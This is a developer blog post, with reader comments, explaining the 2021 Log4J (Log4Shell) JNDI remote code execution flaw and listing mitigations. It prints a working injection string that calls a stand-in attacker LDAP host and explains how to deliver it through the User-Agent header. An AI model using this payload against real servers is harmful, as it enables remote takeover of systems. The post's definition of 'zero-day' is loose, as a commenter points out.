DEV Community

Cover image for Massive Log4j Java vulnerability: What it is & how to fix it?
Mukund Madhav
Mukund Madhav

Posted on • Updated on • Originally published at mukundmadhav.com

Massive Log4j Java vulnerability: What it is & how to fix it?

Found on December 11 through an POC, Log4J’s vulnerability is one of the biggest vulnerabilities we have found. This will affect tens of thousands of enterprise websites running on Java. Let’s go through, what happened and how to fix it?

What is Log4J?

Log4J is an extremely popular open-sources library used in Java to manage application logging. It is an extremely popular library among Java developers because of how simple it makes logging in Java.

What does zero-day vulnerability mean?

This means the developer has “zero days” to fix the bug and this can affect the systems immediately.

Apache log4j

What does this log4j vulnerability do?

This is a Remote Code Execution vulnerability, meaning external malicious code can run on the server with it.

You might think how can a logging library help in remote code execution? Well, the reason why this is happening is a feature, present in Log4J. It enables log4J to actually execute Java code. This is enabled through something called JNDI.

What is JNDI?

JNDI stands for Java Naming and Directory Interface. It is an API that allows applications to check on services in a resource-independent way. This has several uses — for instance, it enables access to Java resources without exposing the resources or path to them.

JNDI

How JNDI works

Now, in case of log4j, when it sees a JNDI reference in its logs, it will actually go to the resource location and fetch what it needs to resolve the JNDI variable and execute it.
And in the process of fetching the resource (LDAP resource), it can download remote classes and execute them!

So, someone can inject something like this in logs and the server would be compromised:

${jndi:ldap://hacker.com/hack}
Enter fullscreen mode Exit fullscreen mode

Now obvious question, how can you know what is getting logged? Because if you pass something and that isn’t logged, the attack is useless, right?

One of the most common things that gets logged are User-Agents (which helps server identify the clients’ OS, browser, etc.).

Java User Agents

So, if we can change the User-Agent in the request header to our malicious JNDI and if the User Agent is logged, remote code would be executed on the server.

There you go. Hacked 101 🎃

Who are affected?

Virtually every company using Java and log4J… which might be most of the enterprise customers.

As of writing this, Apple, Amazon, Twitter, Cloudflare, Steam, Tencent, Baidu are acknowledged to be vulnerable. But most probably, the real number is much more.

For more on Java and web dev. let's connect on Twitter, Mukund Madhav

So, what’s the fix?

There are currently four solutions floating around:

  1. Upgrade Log4J to 2.15.0. Here is the download link for Log4J.
  2. Set this system level property
log4j2.formatMsgNoLookups=true
Enter fullscreen mode Exit fullscreen mode

This will disable the JNDI lookup feature. This will work if you have log4j v2.1 - 2.14.1

3. Delete the JNDI class file. It will be named JdniLookup.class and should be inside org/apache/logging/log4j/core/lookup/JndiLookup.class

4. For versions 2.1 to 2.14.1, set the following environment variable to force change

LOG4J_FORMAT_MSG_NO_LOOKUPS="true"
Enter fullscreen mode Exit fullscreen mode

That’s it. Safe to say this will go down as one of the most obvious (but hopefully not much exploited in future) bug.

Not a cool day to say,

Java devices

Java runs on 3 billion devices

Happy fixing 😃

Top comments (14)

Collapse
 
jayjeckel profile image
Jay Jeckel

Great breakdown of the vulnerability.

This whole situation is ridiculous. Firstly, you have a logging library that, for some reason, allows arbitrary strings to be evaluated as code. Besides executions of strings being a huge danger in the best of situations, that is such a mixture of concerns that it boggles the mind. It's a logging library, the only thing it should do is log things, that's it, nothing more.

But, fine, the library's been around for a while and that is how it works. The real WTF here is that, apparently, a whole bunch of top tier tech companies just pass around input strings without sanitizing them. That is coding 101 level of stuff, don't trust anything you get from outside the system, always sanitize your input.

Crap like this is why you'll never catch me trusting my life to one of these company's self-driving cars. How can anyone trust complex code from them when they can't even log text correctly...

Collapse
 
_hs_ profile image
HS

Just wanted to add a comment about the whole thing but this one covers enough of it. My main question is why would you log stuff that could potentially inject this kind of the thing? So question that pops up right on top if it is: Is this really that huge of a problem?

I assumed, when logging, companies log descriptive info. For example if someone is trying something funny than "this IP or this user is hitting this endpoint too much..." or something like that. Vulnerability would be to log the actual input of what was requested / sent to the server. Why??? All the security practices are against it starting from mistakes where generic logging was logging username-password combinations because they made it so generic that it started logging anything. Next one is GDPR issues and other basic decency concerns of logging what the user sent. Are we really that dependent on input data to understand the problem or detect the "attempt of hacking"? Nothing I've seen so far had this kind of problem so log4j issue would be simply just a theoretical possibility rather than real problem. But I am naïve. I do try to respect users and use as less storage as possible if there's no clear business request for it.

Collapse
 
jayjeckel profile image
Jay Jeckel • Edited

As I understand it from other articles, in most cases they aren't logging user input in the sense that users typed stuff into a form and that text was logged; they are logging data, like user-agent example mentioned above, that is normally automatically generated but can be manually sent by malicious actors.

I say in most cases, because one blog I read mentioned that some of this enterprise software was using the library to explicitly log suspicious text manually entered by users, like strange input being put into username/password fields. Ironically enough, this was being done to try and catch malicious actors attempting to hack the site.

My main question is why would you log stuff that could potentially inject this kind of the thing?

Most devs using the library probably didn't even know the library could execute strings. Which is totally understandable, because who in their right mind would ever think a logging library would do that.

So question that pops up right on top if it is: Is this really that huge of a problem?

I'm not a Java guy, but I've got a few years experience modding Minecraft, which uses the library. Thinking back, I've seen a few cases where this could be exploited in moderately popular mods.

For example, Forge, the defacto Minecraft modding framework, allows inter-mod communication and more than a few times I've seen mods log these strings if they don't match the expected patterns. So there is any Minecraft server compromised if a malicious mod is installed.

In another example, the game has slash commands in chat and I've seen more than a few mods that log the text of malformed commands and I wouldn't be surprised if some of the built in ones do as well. With that there is a server compromised by any malicious user that logs on and chats.

Granted, this is just a game, but as far as games go Minecraft is big business and one where there are plenty of griefers ready and willing to take advantage.

I assumed, when logging, companies log descriptive info. For example if someone is trying something funny than "this IP or this user is hitting this endpoint too much..." or something like that.

Ah, there's the problem, we're talking about Enterprise software here. You should always assume that the project was outsource to underpaid interns that barely understand the problem domain, will ignore the spec, and who think programming is throwing copy/pasted stackoverflow answers at the wall until the client goes away, the company goes bankrupt, or they move on to their next job.

In other words...

Is this really that huge of a problem?

Oh yea, you can bet money that to some level this vulnerability sits in just about every major Java code base at every major Java company that uses log4j. One could probably start an international sports league with the number of devs who just learned log4j could do this and are now rushing to fix their various products.

Thread Thread
 
_hs_ profile image
HS • Edited

Thanks for the great input. Regarding "is this that huge of a problem" I'm from technical point of view not business. Bad decisions were made and of course it is but question is why? Regarding loging user browser or such, again why? If there's a problem ask user for that data; why collect the data beforhand? It all boils down again to the obsessive analitics that spend more money for collection and data processing than it brings value to the business. But what do I know, right? There's a reason these managers are paid good money to make us do these things right?
I fully agree, logger should just logg. But one more thing just to be realistic about imapct area: in cloud era don't people use proxies to log network stuff? Like fire up java apps in kubernetes and let proxies log data like that before the app is even hit? Again making app log only descripitve part when you actually have to.

Thread Thread
 
jayjeckel profile image
Jay Jeckel

Reading posts from devs finding and patching these issues in their projects, the answer to "why" these things were being logged is as varied as the codebases. There is definitely too many cases of some pointy hair manager demanding more analytics to impress their even pointier haired bosses, but in many cases it is the normal reasons any dev logs anything, to help ensure the code is running correctly.

To all your very reasonable questions asking "but don't they do X"... unfortunately, nine times out of ten, the answer is, yes, that is what they should do, but, no, that isn't what they do.

If you have any illusion that these big tech companies are bastions of best practices and clean code, just go read the archives on dailyWTF or rants on devrant. There is a reason that calling something Enterprise SoftwareTM is considered an insult.

Thread Thread
 
mukundmadhav profile image
Mukund Madhav

The main grunt of this problem will be felt by companies using interns and underpaid devs in small org like local banks and several other IT services.

Big tech giants are well aware to push a fix immediately, but you can't expect every small scale startup to know and fix this immediately. And, if you're small a attack as simple as this will blow out your company.

I hope everyone uses Cloudflare or some other CDNs because Cloudflare has begun handling malicious user strings even for its free plan.

Collapse
 
mukundmadhav profile image
Mukund Madhav

In most cases, you won't know what gets logged.

But if we use the plethora of other Apache libraries like Struts, they are suspected to log User Agents. So even if you don't log the user inputs, this other library might be doing it.

So instead of checking, if you log the user headers/input, the best way to avoid getting into this situation is to disable JNDI for logs altogether.

Thread Thread
 
_hs_ profile image
HS

As @@jayjeckel asked, I did have an illusion that other companies have better practices in place like JNDI would be disabled and no logging in app about these things but through proxies. Now I finally understand why I don't fit in companies and keep looking for job after job every 1-2 years. It's an illusion I can't escape of expectations too high.

Collapse
 
jimas13 profile image
jimas13 • Edited

I suggest you correct the "zero day vulnerability" definition, as the definition you have given it will confuse a lot of people. Basically, a zero day vulnerability is the time that the vulnerability goes public and no patch has been developed, which means that it's out there and ready to be exploited.
Here's the official:
"A zero-day (also known as 0-day) is a computer-software vulnerability either unknown to those who should be interested in its mitigation (including the vendor of the target software) or known and a patch has not been developed. Until the vulnerability is mitigated, hackers can exploit it to adversely affect programs, data, additional computers or a network.[1] An exploit directed at a zero-day is called a zero-day exploit, or zero-day attack."

Collapse
 
mukundmadhav profile image
Mukund Madhav

I wanted to simplify from the Wikipedia explaination. As essentially, zero day means that all systems are immediately prone to attack and patch should happen immediately.

Collapse
 
jimas13 profile image
jimas13

Ok mate, but the outcome is far away from the original.

Collapse
 
siy profile image
Sergiy Yevtushenko

The issue appears in two cases: when malicious input is part of format string (which is bad practice and usually avoided) and when format string explicitly refers a variable (contains pattern like ${object.property}) - frankly, I didn't even know that such syntax is supported. Finally, issue is not applicable to most recent versions of all supported JVM releases.

If to sum up: the hype is much louder than real issue is.

Collapse
 
albertowar profile image
Alberto Guerra González

Really good summary. Well done!

Collapse
 
mukundmadhav profile image
Mukund Madhav

Glad you liked it :)